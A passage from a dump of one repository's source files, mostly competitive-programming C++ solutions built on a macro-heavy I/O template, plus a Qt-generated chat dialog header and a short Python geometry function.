\"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.6616331338882446, "alphanum_fraction": 0.673378050327301, "avg_line_length": 44.846153259277344, "blob_id": "d563d936eed9d98c108614658586c582314bc875", "content_id": "875453394899f2b525b645fe7a1c10d3883b1620", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1788, "license_type": "no_license", "max_line_length": 165, "num_lines": 39, "path": "/staff/writeln.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#ifndef WRITELN\n#define WRITELN\n\n#include <iostream>\n#include <vector>\n#include <string>\n#include <sstream>\n\nusing namespace std;\n\n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n#define wr(args...) err(ssplit(#args,',').begin(),args)\n\ninline void writeln2(){cout<<endl;}\ninline void writeln() {cout<<endl;}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... 
tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s){priws(*f);for(auto i=++f;i!=s;++i)print(*i);}writeln();}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>ssplit(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.push_back(x);return v;}\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n\n#endif\n" }, { "alpha_fraction": 0.4881640374660492, "alphanum_fraction": 0.5075489282608032, "avg_line_length": 34.766666412353516, "blob_id": "7a0a50f89f21ece9409422fe49605e04f8db78a4", "content_id": "9576c5e8d8e25e14676644bed65049a84953c5f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5365, "license_type": "no_license", "max_line_length": 163, "num_lines": 150, "path": "/CodeForce/1089/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(a, b);\n vector<pii> scores = {{3, 0}, {3, 1}, {3, 2}, {2, 3}, {1, 3}, {0, 3}};\n for (auto& [f, s]: scores)\n {\n int cf = 0;\n int cs = 0;\n int n = f + s;\n vector<pii> score(n);\n if (s > f)\n {\n fori(f) score[i] = {25, 0}, cf += 25;\n fori(s) score[i + f] = {0, 25}, cs += 25;\n }\n else\n {\n fori(s) score[i] = {0, 25}, cs += 25;\n fori(f) score[i + s] = {25, 0}, cf += 25;\n }\n if (n == 5)\n {\n auto& [lf, ls] = score.back();\n if (lf) lf -= 10, cf -= 10;\n else ls -= 10, cs -= 10;\n }\n auto check = [&a, &b, &n](vector<pii> currScore, int cf, int cs, int index) {\n if (index < n)\n {\n if (currScore[index].first)\n currScore[index].second = currScore[index].first - 2,\n cs += currScore[index].second;\n else\n currScore[index].first = currScore[index].second - 2,\n cf += currScore[index].first;\n auto diff = max(min(a - cf, b - cs), 0);\n currScore[index].first += diff,\n currScore[index].second += diff,\n cf += diff,\n cs += diff;\n }\n\n fori(n)\n while (cf < a && currScore[i].first + 2 < currScore[i].second)\n currScore[i].first++,\n cf++;\n fori(n)\n while (cs < b && currScore[i].second + 2 < currScore[i].first)\n currScore[i].second++,\n cs++;\n //printf(\"%d %d:%d\\n\", index, cf, cs);\n //fori(n)\n //printf(\"%d:%d%c\", currScore[i].first, currScore[i].second, \" \\n\"[i == n - 1]);\n\n if (cf == a && cs == b)\n return currScore;\n else\n return vector<pii>();\n };\n forj(n + 1)\n if (auto currScore = check(score, cf, cs, j); currScore.size())\n {\n 
printf(\"%d:%d\\n\", f, s);\n fori(n)\n printf(\"%d:%d%c\", currScore[i].first, currScore[i].second, \" \\n\"[i == n - 1]);\n return;\n }\n }\n \n writeln(\"Impossible\");\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n //ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n ints(t);\n fori(t)\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&& a){cout<<\" \"<<a;}\nttti void priws(T&& a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.6016916632652283, "alphanum_fraction": 0.6701268553733826, "avg_line_length": 35.125, "blob_id": "8b3cb2ab14226cf593d9f92688f3b601fd08127a", "content_id": "92a987868b1a6b06fba5cbd673b6d627893dff10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5202, "license_type": "no_license", "max_line_length": 275, "num_lines": 144, "path": "/study/ChatNotDemo/ui_chatdialog.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "/********************************************************************************\n** Form generated 
from reading UI file 'chatdialog.ui'\n**\n** Created by: Qt User Interface Compiler version 5.15.2\n**\n** WARNING! All changes made in this file will be lost when recompiling UI file!\n********************************************************************************/\n\n#ifndef UI_CHATDIALOG_H\n#define UI_CHATDIALOG_H\n\n#include <QtCore/QVariant>\n#include <QtWidgets/QApplication>\n#include <QtWidgets/QDialog>\n#include <QtWidgets/QHBoxLayout>\n#include <QtWidgets/QLabel>\n#include <QtWidgets/QLineEdit>\n#include <QtWidgets/QListWidget>\n#include <QtWidgets/QPushButton>\n#include <QtWidgets/QTextEdit>\n#include <QtWidgets/QVBoxLayout>\n\nQT_BEGIN_NAMESPACE\n\nclass Ui_ChatDialog\n{\npublic:\n QVBoxLayout *vboxLayout;\n QHBoxLayout *horizontalLayout_2;\n QPushButton *History;\n QHBoxLayout *hboxLayout;\n QTextEdit *textEdit;\n QListWidget *listWidget;\n QHBoxLayout *hboxLayout1;\n QLabel *label;\n QLineEdit *lineEdit;\n QPushButton *pushButton;\n\n void setupUi(QDialog *ChatDialog)\n {\n if (ChatDialog->objectName().isEmpty())\n ChatDialog->setObjectName(QString::fromUtf8(\"ChatDialog\"));\n ChatDialog->resize(704, 529);\n vboxLayout = new QVBoxLayout(ChatDialog);\n#ifndef Q_OS_MAC\n vboxLayout->setSpacing(6);\n#endif\n#ifndef Q_OS_MAC\n vboxLayout->setContentsMargins(9, 9, 9, 9);\n#endif\n vboxLayout->setObjectName(QString::fromUtf8(\"vboxLayout\"));\n horizontalLayout_2 = new QHBoxLayout();\n horizontalLayout_2->setObjectName(QString::fromUtf8(\"horizontalLayout_2\"));\n horizontalLayout_2->setContentsMargins(-1, 8, -1, -1);\n History = new QPushButton(ChatDialog);\n History->setObjectName(QString::fromUtf8(\"History\"));\n History->setMaximumSize(QSize(16777215, 16777215));\n History->setFocusPolicy(Qt::NoFocus);\n\n horizontalLayout_2->addWidget(History);\n\n\n vboxLayout->addLayout(horizontalLayout_2);\n\n hboxLayout = new QHBoxLayout();\n#ifndef Q_OS_MAC\n hboxLayout->setSpacing(6);\n#endif\n hboxLayout->setContentsMargins(0, 0, 0, 0);\n 
hboxLayout->setObjectName(QString::fromUtf8(\"hboxLayout\"));\n textEdit = new QTextEdit(ChatDialog);\n textEdit->setObjectName(QString::fromUtf8(\"textEdit\"));\n textEdit->setMouseTracking(false);\n textEdit->setFocusPolicy(Qt::NoFocus);\n textEdit->setReadOnly(true);\n\n hboxLayout->addWidget(textEdit);\n\n listWidget = new QListWidget(ChatDialog);\n listWidget->setObjectName(QString::fromUtf8(\"listWidget\"));\n QSizePolicy sizePolicy(QSizePolicy::Expanding, QSizePolicy::Expanding);\n sizePolicy.setHorizontalStretch(0);\n sizePolicy.setVerticalStretch(0);\n sizePolicy.setHeightForWidth(listWidget->sizePolicy().hasHeightForWidth());\n listWidget->setSizePolicy(sizePolicy);\n listWidget->setMaximumSize(QSize(180, 16777215));\n listWidget->setFocusPolicy(Qt::NoFocus);\n\n hboxLayout->addWidget(listWidget);\n\n\n vboxLayout->addLayout(hboxLayout);\n\n hboxLayout1 = new QHBoxLayout();\n#ifndef Q_OS_MAC\n hboxLayout1->setSpacing(6);\n#endif\n hboxLayout1->setContentsMargins(0, 0, 0, 0);\n hboxLayout1->setObjectName(QString::fromUtf8(\"hboxLayout1\"));\n label = new QLabel(ChatDialog);\n label->setObjectName(QString::fromUtf8(\"label\"));\n\n hboxLayout1->addWidget(label);\n\n lineEdit = new QLineEdit(ChatDialog);\n lineEdit->setObjectName(QString::fromUtf8(\"lineEdit\"));\n\n hboxLayout1->addWidget(lineEdit);\n\n pushButton = new QPushButton(ChatDialog);\n pushButton->setObjectName(QString::fromUtf8(\"pushButton\"));\n pushButton->setFocusPolicy(Qt::TabFocus);\n\n hboxLayout1->addWidget(pushButton);\n\n\n vboxLayout->addLayout(hboxLayout1);\n\n\n retranslateUi(ChatDialog);\n QObject::connect(History, SIGNAL(clicked()), ChatDialog, SLOT(clearHistory()));\n QObject::connect(lineEdit, SIGNAL(editingFinished()), ChatDialog, SLOT(returnPressed()));\n QObject::connect(pushButton, SIGNAL(clicked()), ChatDialog, SLOT(returnPressed()));\n\n QMetaObject::connectSlotsByName(ChatDialog);\n } // setupUi\n\n void retranslateUi(QDialog *ChatDialog)\n {\n 
ChatDialog->setWindowTitle(QCoreApplication::translate(\"ChatDialog\", \"\\320\\247\\320\\260\\321\\202\", nullptr));\n History->setText(QCoreApplication::translate(\"ChatDialog\", \"\\320\\276\\321\\207\\320\\270\\321\\201\\321\\202\\320\\270\\321\\202\\321\\214 \\320\\270\\321\\201\\321\\202\\320\\276\\321\\200\\320\\270\\321\\216 \\321\\201\\320\\276\\320\\276\\320\\261\\321\\211\\320\\265\\320\\275\\320\\270\\320\\271\", nullptr));\n label->setText(QCoreApplication::translate(\"ChatDialog\", \"\\320\\241\\320\\276\\320\\276\\320\\261\\321\\211\\320\\265\\320\\275\\320\\270\\320\\265:\", nullptr));\n pushButton->setText(QCoreApplication::translate(\"ChatDialog\", \"\\320\\276\\321\\202\\320\\277\\321\\200\\320\\260\\320\\262\\320\\270\\321\\202\\321\\214\", nullptr));\n } // retranslateUi\n\n};\n\nnamespace Ui {\n class ChatDialog: public Ui_ChatDialog {};\n} // namespace Ui\n\nQT_END_NAMESPACE\n\n#endif // UI_CHATDIALOG_H\n" }, { "alpha_fraction": 0.37775060534477234, "alphanum_fraction": 0.42665037512779236, "avg_line_length": 23.058822631835938, "blob_id": "dc9dba1a69db3352b8cd0377b0b96a45a7ffcd0b", "content_id": "35511e0ce675b915412cc25b07c838ea47d8c8f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 818, "license_type": "no_license", "max_line_length": 96, "num_lines": 34, "path": "/2022/sberFinal/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#\n# Implement function get_result\n#\n\ndef orientation(ax, ay, bx, by, cx, cy):\n return ax*by-ay*bx-ax*cy+ay*cx+bx*cy-by*cx\ndef get(x):\n if x >= 0:\n return 1\n return -1\ndef get_result(a):\n n = len(a)\n used = [0 for i in range(n)]\n ans = 0\n for i in range(0, n, 2):\n if used[i] == 1:\n continue\n used[i] = 1\n ans += 1\n for j in range(i, n, 2):\n if used[j] == 1:\n continue\n\n bx = get(a[i])\n by = get(a[i + 1])\n cx = get(a[j])\n cy = get(a[j + 1])\n if bx == cx and by == cy and orientation(0, 0, a[i], a[i + 1], a[j], a[j 
+ 1]) == 0:\n used[j] = 1\n\n return ans\n\nprint(get_result([2, 2, -2, 2, -2, -2, 2, -2]))\nprint(get_result([2,2,-2,2,-2,-2,2,-2,1,1,-1,3]))\n" }, { "alpha_fraction": 0.4224448800086975, "alphanum_fraction": 0.4376753568649292, "avg_line_length": 29.613496780395508, "blob_id": "8f27e97cab169de8151f25c8141068360f0e2a91", "content_id": "f3f91294ac0375dfe04dbdc4a4d6978bef83f49d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4990, "license_type": "no_license", "max_line_length": 174, "num_lines": 163, "path": "/CodeForce/1450/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, m);\n vector<vector<pii>> g(n);\n fori(m)\n {\n ints(u, v, b); --u; --v;\n g[u].pb({v, b});\n g[v].pb({u, -b});\n }\n int answer = -1;\n vector<int> qqq;\n fori(n)\n {\n bool ok = true;\n vector<pii> edges;\n queue<int> q;\n q.push(i);\n vector<int> d(n, MOD), tuda(n), suda(n), tt(n, 0), ss(n, 0);\n d[i] = 0;\n while (q.size())\n {\n int u = q.front();\n q.pop();\n forj(g[u].size()) \n {\n auto [v, b] = g[u][j];\n if (d[v] + 1 == d[u]) continue;\n\n if (d[v] != MOD && d[u] + 1 != d[v]) //odd cycle\n {\n //writeln(\"FAIL\", u + 1, v + 1, d[u], d[v]); cout.flush();\n ok = false;\n break;\n }\n else\n {\n if (d[v] == MOD)\n d[v] = d[u] + 1,\n q.push(v);\n tuda[v] = max(tuda[v], tuda[u] + (b == 1));\n suda[v] = max(suda[v], suda[u] + (b == -1));\n edges.pb({u, j});\n }\n }\n }\n //writeln(i + 1);\n //writeln(d);\n //writeln(tuda);\n //writeln(suda);\n forj(n)\n ok &= tuda[j] + suda[j] <= d[j];\n if (!ok)\n continue;\n reverse(all(edges));\n for (auto [u, j]: edges)\n {\n auto& [v, b] = g[u][j];\n if (b == 1)\n tt[u]++;\n else if (b == -1)\n ss[u]++;\n else\n if (tuda[v] > ss[u])\n ss[u]++,\n b = -1;\n else\n tt[u]++,\n b = 1;\n }\n vector<int> ans(n, MOD);\n ans[i] = 0;\n q.push(i);\n while (q.size())\n {\n int u = q.front();\n q.pop();\n for (auto [v, b]: g[u])\n if (ans[v] == MOD)\n ans[v] = ans[u] + b,\n q.push(v);\n else\n if (ans[v] != ans[u] + 1 && ans[u] != ans[v] + 1)\n ok = false;\n }\n\n //writeln(tuda);\n //writeln(suda);\n if (!ok) continue;\n int mn = *min_element(all(ans));\n for (int& x: ans)\n x -= mn;\n int mx = *max_element(all(ans));\n if (mx > answer)\n answer = mx,\n qqq = ans;\n //writeln(ans);\n //writeln();\n cout.flush();\n }\n if (answer == -1)\n writeln(\"NO\");\n else\n writeln(\"YES\"),\n writeln(answer),\n writeln(qqq);\n}\n\n//{{{\nint main()\n{\n 
ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4631134271621704, "alphanum_fraction": 0.47524645924568176, "avg_line_length": 27.229358673095703, "blob_id": "ec9f044bb405aa26d8d5b27518e49fa5355926dc", "content_id": "3f78f5bf39ee2eb1ec5010803d76e1cb995f20e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9231, "license_type": "no_license", "max_line_length": 174, "num_lines": 327, "path": "/CodeForce/1576/A29.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#ifdef ONLINE_JUDGE\n#pragma GCC optimize(\"Ofast\")\n#endif\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n\n//}}}\n\n[[maybe_unused]] const int GFL = 100;\n[[maybe_unused]] const int NFL = 200;\n\nstruct edge // {{{\n{\n int id;\n int g;\n int from;\n int to;\n int d;\n int c;\n int now = 0;\n\n int getTo(int u) const\n {\n return from ^ to ^ u;\n }\n\n edge() {}\n\n friend istream& operator>>(istream& in, edge& e) {\n return in >> e.id >> e.g >> e.from >> e.to >> e.d >> e.c;\n }\n \n friend ostream& operator<<(ostream& out, const edge& e) {\n return out << \"Edge: \" << e.id << \", g \" << e.g << \", from \" << e.from << \", to \" << e.to << \", d \" << e.d << \", c \" << e.c << \", now \" << e.now;\n }\n};\n\nstruct node\n{\n int id;\n vector<int> out;\n unordered_set<int> restrictions;\n int now = 0;\n\n node() {}\n\n void addRestriction(int fromEdge, int toEdge)\n {\n restrictions.insert(getHash(fromEdge, toEdge));\n }\n\n int getHash(int fromEdge, int toEdge) const\n {\n return (min(fromEdge, toEdge) << 16) + max(fromEdge, toEdge);\n }\n\n bool can(int fromEdge, int toEdge) const \n {\n if (fromEdge == -1 || toEdge == -1) return true;\n return restrictions.count(getHash(fromEdge, toEdge)) == 0;\n }\n\n friend ostream& operator<<(ostream& out, const node& e) {\n return out << \"Node \" << e.id << \", out \" << e.out.size() << \", restrictions \" << e.restrictions.size() << \", now \" << e.now;\n }\n\n};\n\nstruct flow\n{\n int id;\n int from;\n int to;\n int r;\n bool use = false;\n vector<int> path;\n\n flow() {}\n\n friend istream& operator>>(istream& in, flow& e) {\n return in >> e.id >> e.from >> e.to >> e.r;\n }\n \n friend ostream& operator<<(ostream& out, const flow& e) {\n return out << \"Flow \" << e.id << \", from \" << e.from << \", to \" << e.to << \", rate \" << e.r;\n }\n\n};\n\nstruct group\n{\n int now = 0;\n\n group() {}\n}; // 
}}}\n\nvoid run()\n{\n double time = clock();\n ints(n, m, c, F); int g = 4500;\n vector<node> nodes(n);\n fori(n) nodes[i].id = i;\n vector<edge> edges(m);\n vector<flow> flows(F);\n vector<group> groups(g + 1);\n\n { //READ INPUT\n readln(edges);\n for (const auto& e: edges)\n nodes[e.from].out.pb(e.id),\n nodes[e.to].out.pb(e.id);\n forn(q, c)\n {\n ints(id, u, v);\n nodes[id].addRestriction(u, v);\n }\n readln(flows);\n fori(n)\n shuffle(all(nodes[i].out), rng);\n\n\n //writeln(nodes);\n //writeln(edges);\n //writeln(flows);\n }\n\n auto checkCannotUseEdge = [&](int u, int v, int fromEdge, const flow& f, const edge& e) {\n return groups[e.g].now == GFL || nodes[v].now == NFL || e.now + f.r > e.c || !nodes[u].can(e.id, fromEdge);\n };\n\n vector<int> d(n, MOD);\n vector<pii> p(n, {-1, -1});\n vector<bool> used(n, false);\n auto getPath = [&](const flow& f) {\n fori(n)\n d[i] = MOD,\n p[i] = {-1, -1},\n used[i] = false;\n d[f.from] = 0;\n if (nodes[f.from].now == NFL) return vector<int>();\n if (nodes[f.to].now == NFL) return vector<int>();\n\n auto bfs = [&]() {\n queue<tuple<int, int, int>> s;\n s.push({0, f.from, -1});\n while (s.size())\n {\n auto [_, u, fromEdge] = s.front();\n s.pop();\n //s.erase(s.begin());\n used[u] = true;\n if (u == f.to) break;\n for (const int& eid: nodes[u].out)\n {\n const auto& e = edges[eid];\n int v = e.getTo(u);\n if (used[v] || checkCannotUseEdge(u, v, fromEdge, f, e))\n continue;\n int cur = d[u] + 1;\n if (cur < d[v])\n {\n d[v] = cur;\n p[v] = {u, e.id};\n s.push({d[v], v, e.id});\n }\n }\n }\n };\n\n bfs();\n if (d[f.to] == MOD)\n return vector<int>();\n\n vector<int> path;\n int u = f.to;\n while (u != -1 && p[u].second != -1)\n path.pb(p[u].second),\n u = p[u].first;\n reverse(all(path));\n return path;\n };\n\n auto applyPath = [&](flow& f) {\n unordered_set<int> ggg;\n int u = f.from;\n for (int& eid: f.path)\n {\n edge& e = edges[eid];\n e.now += f.r;\n nodes[u].now++;\n u = e.getTo(u);\n ggg.insert(e.g);\n }\n for 
(int gg: ggg)\n groups[gg].now++;\n nodes[u].now++;\n };\n\n sort(all(flows), [](const flow& a, const flow& b) {\n return a.r < b.r;\n });\n fori((7 * F + 7) / 8)\n flows[i].use = true;\n shuffle(all(flows), rng);\n\n //int i = 0;\n for (auto& f: flows)\n if (f.use)\n {\n \n if (1000.0 * (clock() - time) / CLOCKS_PER_SEC > 1950)\n break;\n //if (++i % 100 == 99)\n //cerr << i << \"/\" << F << endl;\n const auto path = getPath(f);\n if (!path.size())\n continue;\n f.path = path;\n applyPath(f);\n }\n\n //writeln(nodes);\n //writeln(edges);\n int ans = 0;\n { //PRINT ANSWER\n for (const auto& f: flows) ans += f.path.size() != 0;\n writeln(ans);\n for (const auto& f: flows) if (f.path.size()) writeln(f.id, f.path);\n\n }\n\n#ifndef ONLINE_JUDGE\n {\n vector<int> E(m);\n vector<int> N(n);\n vector<set<int>> G(g + 1);\n for (const auto& f: flows)\n {\n if (!f.path.size()) continue;\n set<int> nodesPerPath;\n set<int> edgesPerPath;\n int u = f.from;\n\n for (auto& eid: f.path)\n {\n auto e = edges[eid];\n E[eid] += f.r;\n N[u]++;\n if (!nodesPerPath.insert(u).second)\n writeln(\"NODE\", u, \"ALREADY EXISTS IN FLOW\", f.id);\n G[e.g].insert(f.id);\n if (!edgesPerPath.insert(eid).second)\n writeln(\"EDGE\", eid, \"ALREADY EXISTS IN FLOW\", f.id);\n u = e.getTo(u);\n }\n if (!nodesPerPath.insert(u).second)\n writeln(\"NODE\", u, \"ALREADY EXISTS IN FLOW\", f.id);\n N[u]++;\n }\n fori(m)\n if (E[i] > edges[i].c)\n writeln(\"ERROR EDGE CAPACITY\", i, \"EXPECTED <=\", edges[i].c, \"FOUND\", E[i]);\n fori(n)\n if (N[i] > NFL)\n writeln(\"ERROR NODE FLOW LIMIT\", i, \"EXPECTED <=\", NFL, \"FOUND\", N[i]);\n fori(g + 1)\n if (G[i].size() > GFL)\n writeln(\"ERROR GROUP FLOW LIMIT\", i, \"EXPECTED <=\", GFL, \"FOUND\", G[i].size());\n\n cerr << ans << endl;\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n }\n#endif\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n return 0;\n}\n\n#define a 
